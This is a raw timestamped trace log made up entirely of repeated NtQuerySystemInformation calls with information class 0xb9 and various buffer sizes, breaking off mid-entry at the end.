[0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0207.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x28, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0207.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x28, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccb0, Length=0x20, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce20, Length=0x20, ResultLength=0x0) [0207.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdb0, Length=0x20, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdb0, Length=0x20, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x50, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0207.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0207.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd070, Length=0x28, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0e0, Length=0x28, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0207.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0207.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd240, Length=0x38, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd050, Length=0x20, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x50, ResultLength=0x0) [0207.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf20, Length=0x28, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x28, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x38, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0207.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x28, ResultLength=0x0) [0207.060] NtQuerySystemInformation (SystemInformationClass=0xb9, 